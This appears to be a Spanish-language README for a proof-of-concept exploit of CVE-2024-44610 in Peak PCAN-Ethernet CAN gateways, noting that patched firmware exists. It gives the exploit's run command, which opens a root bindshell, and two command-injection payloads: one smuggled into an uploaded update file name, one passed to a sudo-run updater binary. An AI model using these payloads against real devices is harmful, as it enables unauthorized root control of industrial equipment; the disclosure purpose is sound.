
CVE-2024-44610: Exploit remoto autenticado de root en gateways Peak PCAN-Ethernet CAN-(FD)
Este repositorio contiene un exploit de Prueba de Concepto (PoC) que ejecutó código como root en las puertas de enlace Ethernet de Peak. Requiere que conozcas las credenciales de la interfaz web.
El proveedor ha proporcionado rápidamente firmware corregido:
Compila el programa usando Golang y luego ejecútalo de la siguiente manera:
./PcanExploit -ip 192.168.1.10 -httpaddr 192.168.1.250 -user admin -pass admin [-fd]
Si el exploit fue exitoso, se iniciará una bindshell en el dispositivo como root. Puedes ver dos capturas de pantalla al final de esta página.
Las opciones tienen el siguiente significado:
Aunque la versión no FD también es vulnerable, esto tiene poca importancia práctica ya que estos dispositivos no implementan actualizaciones de firmware firmadas, por lo que podrías simplemente subir tu propio firmware modificado.
Se utilizan dos vulnerabilidades de inyección de comandos de shell:
Es posible incluir un comando de shell en el nombre del archivo del paquete de actualización que se sube a la interfaz web, por ejemplo:
test';ping 1.1.1.1;'.raucb
El comando se ejecutará como el usuario www-data, que ejecuta el servidor web. El nombre del archivo debe tener la extensión correcta (tar o raucb según el dispositivo)
El binario internamente ejecuta system sobre el nombre de archivo proporcionado, siempre que exista. Se puede explotar de la siguiente manera:
sudo /home/peak/updater -f "a;ping 1.1.1.1;"
Dado que este binario se puede ejecutar mediante sudo, es posible ejecutar el comando como root.
Dispositivo FD:

Dispositivo no FD:
